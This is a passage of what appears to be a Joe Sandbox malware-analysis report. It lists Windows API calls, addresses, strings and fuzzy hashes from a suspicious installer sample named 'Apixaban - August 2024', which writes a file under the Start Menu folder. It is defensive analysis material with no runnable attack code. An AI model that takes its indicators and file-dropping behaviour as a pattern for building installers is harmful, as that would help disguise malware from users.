                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                • String ID: 9
                                                • API String ID: 1149667376-2366072709
                                                • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                • String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                                • API String ID: 1453599865-1516462631
                                                • Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                                • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                • Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                                • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                                • GetTickCount.KERNEL32 ref: 00402D51
                                                • wsprintfW.USER32 ref: 00402D7F
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                  • Part of subcall function 00402CFC: MulDiv.KERNEL32(0002C85E,00000064,00032621), ref: 00402D11
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                                • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                                • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                • GetMessagePos.USER32 ref: 00404A7F
                                                • ScreenToClient.USER32(?,?), ref: 00404A99
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                • wsprintfW.USER32 ref: 00402CCF
                                                • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                                • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                • Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                                • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                APIs
                                                • GetDC.USER32(?), ref: 00401D44
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                                • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                • Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                                • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                APIs
                                                • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                • wsprintfW.USER32 ref: 00404A10
                                                • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                                • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                • Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                                • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
                                                • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: : Completed
                                                • API String ID: 3677997916-2954849223
                                                • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                                • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00405939
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00405943
                                                • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4083868402
                                                • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                                • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405135
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                  • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,004037F4,75573420,0040361F,?), ref: 00403837
                                                • GlobalFree.KERNEL32(?), ref: 0040383E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4083868402
                                                • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                                • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-1876063424
